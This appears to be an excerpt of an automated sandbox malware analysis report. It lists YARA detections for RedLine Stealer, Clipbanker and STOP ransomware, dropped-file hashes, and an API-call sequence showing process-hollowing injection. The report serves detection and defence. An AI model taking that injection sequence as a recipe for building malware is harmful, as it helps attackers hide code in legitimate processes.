            Source: 00000026.00000002.1929992675.000000000443A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000015.00000002.1385315034.0000000005E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0000001F.00000002.1490507183.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001E.00000002.1577294491.00000000008CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000026.00000002.1930318065.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000012.00000002.1332771724.0000000001AEE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000015.00000002.1384952175.0000000004413000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000005.00000002.1244558596.0000000004458000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 6692, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 4216, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DC0110
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_05DE0110
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_05DC0110
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_00404F6E0_2_00404F6E
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC35200_2_05DC3520
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC75200_2_05DC7520
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DED7F10_2_05DED7F1
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCA79A0_2_05DCA79A
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCC7600_2_05DCC760
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCE6E00_2_05DCE6E0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCA6990_2_05DCA699
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05E0B69F0_2_05E0B69F
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DED1A40_2_05DED1A4
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05E0E1410_2_05E0E141
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC91200_2_05DC9120
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DD00D00_2_05DD00D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC30F00_2_05DC30F0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC70E00_2_05DC70E0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCB0B00_2_05DCB0B0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCB0000_2_05DCB000
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DDF0300_2_05DDF030
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCA0260_2_05DCA026
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC73930_2_05DC7393
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05E0E37C0_2_05E0E37C
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05E422C00_2_05E422C0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC72200_2_05DC7220
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC5DF70_2_05DC5DF7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC5DE70_2_05DC5DE7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05E02D1E0_2_05E02D1E
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DF4E9F0_2_05DF4E9F
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC8E600_2_05DC8E60
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC89D00_2_05DC89D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC59F70_2_05DC59F7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DEF9B00_2_05DEF9B0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DEE9A30_2_05DEE9A3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCA9160_2_05DCA916
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DDA9300_2_05DDA930
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DE18D00_2_05DE18D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC78800_2_05DC7880
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCDBE00_2_05DCDBE0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC2B600_2_05DC2B60
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DD0B000_2_05DD0B00
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DC7A800_2_05DC7A80
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DCCA100_2_05DCCA10
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040D2402_2_0040D240
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00419F902_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040C0702_2_0040C070
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042E0032_2_0042E003
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004080302_2_00408030
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004101602_2_00410160
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004C81132_2_004C8113
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004021C02_2_004021C0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0044237E2_2_0044237E
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004084C02_2_004084C0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004344FF2_2_004344FF
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0043E5A32_2_0043E5A3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040A6602_2_0040A660
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0041E6902_2_0041E690
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004067402_2_00406740
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004027502_2_00402750
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040A7102_2_0040A710
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004087802_2_00408780
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042C8042_2_0042C804
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004068802_2_00406880
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004349F32_2_004349F3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004069F32_2_004069F3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00402B802_2_00402B80
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00406B802_2_00406B80
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0044ACFF2_2_0044ACFF
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042CE512_2_0042CE51
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00434E0B2_2_00434E0B
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00406EE02_2_00406EE0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00420F302_2_00420F30
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004050572_2_00405057
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042F0102_2_0042F010
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004070E02_2_004070E0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004391F62_2_004391F6
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004352402_2_00435240
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004C93432_2_004C9343
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004054472_2_00405447
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004054572_2_00405457
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004495062_2_00449506
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0044B5B12_2_0044B5B1
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004356752_2_00435675
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004096862_2_00409686
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040F7302_2_0040F730
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0044D7A12_2_0044D7A1
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004819202_2_00481920
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0044D9DC2_2_0044D9DC
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00449A712_2_00449A71
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00443B402_2_00443B40
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00409CF92_2_00409CF9
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040DD402_2_0040DD40
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00427D6C2_2_00427D6C
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040BDC02_2_0040BDC0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00409DFA2_2_00409DFA
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00409F762_2_00409F76
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0046BFE02_2_0046BFE0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00449FE32_2_00449FE3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE35205_2_05DE3520
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE75205_2_05DE7520
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E0D7F15_2_05E0D7F1
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEA79A5_2_05DEA79A
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEC7605_2_05DEC760
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEE6E05_2_05DEE6E0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEA6995_2_05DEA699
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E2B69F5_2_05E2B69F
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E0D1A45_2_05E0D1A4
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E2E1415_2_05E2E141
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE91205_2_05DE9120
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DF00D05_2_05DF00D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE30F05_2_05DE30F0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE70E05_2_05DE70E0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEB0B05_2_05DEB0B0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEB0005_2_05DEB000
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DFF0305_2_05DFF030
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEA0265_2_05DEA026
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE73935_2_05DE7393
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E2E37C5_2_05E2E37C
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E622C05_2_05E622C0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE72205_2_05DE7220
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE5DF75_2_05DE5DF7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE5DE75_2_05DE5DE7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E22D1E5_2_05E22D1E
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E14E9F5_2_05E14E9F
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE8E605_2_05DE8E60
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE89D05_2_05DE89D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE59F75_2_05DE59F7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E0E9A35_2_05E0E9A3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E0F9B05_2_05E0F9B0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEA9165_2_05DEA916
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DFA9305_2_05DFA930
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05E018D05_2_05E018D0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE78805_2_05DE7880
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DEDBE05_2_05DEDBE0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE2B605_2_05DE2B60
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DF0B005_2_05DF0B00
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DE7A805_2_05DE7A80
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 5_2_05DECA105_2_05DECA10
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC35207_2_05DC3520
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC75207_2_05DC7520
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DED7F17_2_05DED7F1
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCA79A7_2_05DCA79A
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCC7607_2_05DCC760
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCE6E07_2_05DCE6E0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCA6997_2_05DCA699
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05E0B69F7_2_05E0B69F
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DED1A47_2_05DED1A4
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05E0E1417_2_05E0E141
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC91207_2_05DC9120
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DD00D07_2_05DD00D0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC30F07_2_05DC30F0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC70E07_2_05DC70E0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCB0B07_2_05DCB0B0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCB0007_2_05DCB000
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DDF0307_2_05DDF030
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCA0267_2_05DCA026
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC73937_2_05DC7393
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05E0E37C7_2_05E0E37C
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05E422C07_2_05E422C0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC72207_2_05DC7220
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC5DF77_2_05DC5DF7
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC5DE77_2_05DC5DE7
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05E02D1E7_2_05E02D1E
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DF4E9F7_2_05DF4E9F
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC8E607_2_05DC8E60
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC89D07_2_05DC89D0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC59F77_2_05DC59F7
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DEF9B07_2_05DEF9B0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DEE9A37_2_05DEE9A3
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCA9167_2_05DCA916
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DDA9307_2_05DDA930
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DE18D07_2_05DE18D0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC78807_2_05DC7880
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCDBE07_2_05DCDBE0
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC2B607_2_05DC2B60
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DD0B007_2_05DD0B00
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DC7A807_2_05DC7A80
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: 7_2_05DCCA107_2_05DCCA10
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe 9B0DA8AB12D9CA7CC05B9553BA3D3407E4EE38CB9A74298096022B2B46563FB2
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 00428C81 appears 42 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 004547A0 appears 75 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 05E10160 appears 50 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 05E08EC0 appears 57 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 0042F7C0 appears 99 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 0044F23E appears 53 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 00428520 appears 77 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 05DF0160 appears 50 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 05DE8EC0 appears 57 times
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: String function: 00454E50 appears 42 times
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: String function: 05DF0160 appears 50 times
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: String function: 05DE8EC0 appears 57 times
            Source: qJKiVKZdFk.exe, 00000000.00000002.1213166908.00000000040A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs qJKiVKZdFk.exe
            Source: qJKiVKZdFk.exe, 00000002.00000003.1232391894.00000000030B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirez( vs qJKiVKZdFk.exe
            Source: qJKiVKZdFk.exe, 00000002.00000000.1210275124.00000000040A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs qJKiVKZdFk.exe
            Source: qJKiVKZdFk.exe, 00000005.00000002.1244374429.00000000040A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs qJKiVKZdFk.exe
            Source: qJKiVKZdFk.exe, 00000006.00000000.1241247927.00000000040A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs qJKiVKZdFk.exe
            Source: qJKiVKZdFk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 40.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 40.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 22.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
